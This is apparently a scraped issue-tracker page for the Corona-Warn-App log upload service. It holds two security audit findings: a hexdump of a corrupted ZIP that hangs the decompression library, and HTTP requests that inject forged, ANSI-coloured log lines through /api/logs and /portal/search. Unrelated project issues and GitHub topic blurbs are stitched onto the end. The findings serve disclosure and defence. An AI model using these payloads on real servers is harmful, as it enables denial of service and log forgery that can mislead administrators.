The log upload service is the counterpart of the log upload in the app. It enables the App developers to analyze the log data uploaded to the CWA infrastructure to identify the root cause of bugs that only occur in rare conditions are not easy to reproduce.
License: Apache License 2.0
Rating: Informational
The JavaScript that is used to process the ZIP archives is vulnerable to a resource exhaustion attack. More specifically,
it is possible to upload a specially crafted ZIP file which leads to an endless loop while decompressing the file.
As the file decompression is done in a separate worker, this does not affect the main process of the log upload browser
tab. Therefore, the implications of this issue are rather low. On the tester’s machine the endless loop resulted in a very
high CPU usage, however, as the main process of the tab is not affected, it can simply be closed to stop the loop.
Due to time restrictions, the cause of this issue has not been further investigated. The issue has been tested in a setup
isolated from the cwa-log-upload application to rule out any possible influence by the application itself. This test showed
that the issue, in fact, stems from the library.
Proof of Concept
The screenshot below shows that the file is struck while decompressing and the processor utilization of the worker
goes up to about 100%:
Below is a hexdump of the offending ZIP file. The file is a partially corrupted ZIP file which contains two files (a and P)
with a size of 34 and 19. It was created during randomly corrupting ZIP files, therefore the corruption does not follow a
specific format.
00000000 50 4b 03 04 14 00 08 00 08 00 00 00 00 00 00 00 |PK..............|
00000010 00 00 00 00 00 00 00 00 00 00 01 00 00 00 61 4a |..............aJ|
00000020 84 82 24 9c 00 10 00 00 ff ff 50 4b 07 08 6f b2 |..$.......PK..o.|
00000030 bf e3 0b 00 00 00 22 00 00 00 50 4b 03 04 14 00 |......"...PK....|
00000040 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 01 00 00 00 62 4a 4c 4a 4e 49 4d 4b |........bJLJNIMK|
00000060 cf 30 30 34 32 36 ff 7f 33 b7 b0 34 00 04 00 00 |.00426..3..4....|
00000070 ff ff 50 4b 07 08 da c9 f3 fc 19 00 00 00 13 00 |..PK............|
00000080 00 00 50 4b 01 02 14 00 14 00 08 00 08 00 00 00 |..PK............|
00000090 00 00 6f b2 bf e3 0b 4c 00 00 22 00 00 00 01 00 |..o....L..".....|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 61 50 4b 01 02 14 00 14 00 08 00 08 00 00 00 00 |aPK.............|
000000c0 00 da c9 f3 fc 19 00 00 00 13 00 00 00 01 00 00 |................|
000000d0 00 00 00 00 00 00 00 00 00 00 00 3a 00 00 00 50 |...........:...P|
000000e0 4b 05 06 00 00 00 00 02 00 02 00 5e 00 00 00 82 |K..........^....|
000000f0 00 00 00 00 00 |.....|
000000f5
substitute minIO storage by OTC's OBS.
The features Upload API and Log-Viewer-Portal need to be seperated by spring profiles.
AK:
The document 'Overview.md' is available at two different positions in the repo:
Note: This needs to be fixed asap.
The two versions are already out of synch.
Merge the two versions, and then delete one.
Rating: Medium
The cwa-log-upload server is vulnerable to a log injection attack at two individual endpoints. This enables an unauthenticated
(as well as an authenticated) attacker to violate the integrity of the cwa-log-upload server logs by injecting
arbitrary log messages. Note that this does not affected the user-supplied log file ZIP archives, but the actual server
logging output.
The injected log entries are not easily distinguishable to legitimate entries that have been appended by the cwa-logupload
server itself.
This issues could be abused for social engineering attacks on administrative personnel by injecting malicious messages
into log files. These could include false error conditions that instruct administrators to, for example, contact someone
or interact with services or systems by restarting them.
In this specific case, the endpoints /api/logs and /portal/search (which requires an authenticated portal user) are
affected.
Proof of Concept:
The following screenshot shows a successfully injected log entry via the /api/logs endpoint:
Request:
POST /api/logs HTTP/1.1
Host: localhost:8085
User-Agent: curl/7.64.1
Accept: */*
Content-Type: multipart/form-data; boundary=11D989FA-25A8-4082-A4D2-703A4A27D392
Cwa-Otp: 357CC67D-3D97-4E4F-8F5B-E4730B71B4BD
Content-Length: 881
Connection: close
--11D989FA-25A8-4082-A4D2-703A4A27D392
Content-Disposition:form-data; name="file"; filename="filename.txt
[2m2021-05-07 17:10:17.277 [0;39m [32m INFO [cwa-log-upload,,] [0;39m [35m50287 [0;39m [2m--- [0;39m
,→ [2m[ main] [0;39m [36ma.c.logupload.LogUploadApplication [0;39m [2m: [0;39m Injected Log Line
Content-Type:application/zip
Content-Length: 458
PK [...]
--11D989FA-25A8-4082-A4D2-703A4A27D392--
Response:
HTTP/1.1 201
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Date: Fri, 07 May 2021 15:14:58 GMT
Connection: close
Content-Length: 63
{"id":"C0B1DBCE400C8610C2FE","hash":"PthK38bUN7JLVgyyk8PmpQ=="}
The following screenshot shows a successfully injected log entry via the /portal/search endpoint, which requires an
authenticated user.
It was created using the following request:
Request
POST /portal/search HTTP/1.1
Host: localhost:8085
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8085
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)
,→ Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q
,→ =0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8085/portal/start?
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,de;q=0.7
Cookie: JSESSIONID=0DD040DF4AD43C531993DD103AE948BE
Content-Length: 357
logId=%0a%1B%5B2m2021-05-07+17%3A10%3A17.277%1B%5B0%3B39m+%1B%5B32m+INFO+%5Bcwa-log-upload%2C%2C%5D%1B
,→ %5B0%3B39m+%1B%5B35m50287%1B%5B0%3B39m+%1B%5B2m---%1B%5B0%3B39m+%1B%5B2m%5B+++++++++++main%5D
,→ %1B%5B0%3B39m+%1B%5B36ma.c.logupload.LogUploadApplication++++++%1B%5B0%3B39m+%1B%5B2m%3A%1B%5
,→ B0%3B39m+Injected+Log+Line&_csrf=6a896d20-cdb6-42b5-bd2f-f94e49752a67
Response:
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Language: en-GB
Date: Fri, 07 May 2021 15:25:38 GMT
Connection: close
Content-Length: 1458
<!DOCTYPE html>
<html lang="de">
<head>
<meta charset="utf-8"/>
<meta content="default-src 'self' style-src 'unsafe-inline'" http-equiv="Content-Security-Policy">
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<link href="/portal/static/css/cwa.css" rel="stylesheet" type="text/css"/>
<title>Corona Warn App - Log Upload</title>
<link href="/portal/static/img/c-19_logo.png" rel="icon"/>
<script src="/portal/static/js/logout.js"></script>
</head>
<body>
[...]
Uploading logs from the app to the server fails with an error message.
Uploading an error log should be possible.
Differ between iOS & Android, should be clear.
@MikeMcC399 found that https://logupload.coronawarn.app has a new SSL certificate issued today. Maybe this is the root cause?
This issue was originally reported by @diablodale via corona-warn-app/cwa-app-android#5089.
For validating data upload, the origin has to be proved to be a real phone.
The phone will send a TOTP Token in the request header to indicate that.
The log upload service must verify this token against the cwa infrastructure for validity.
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.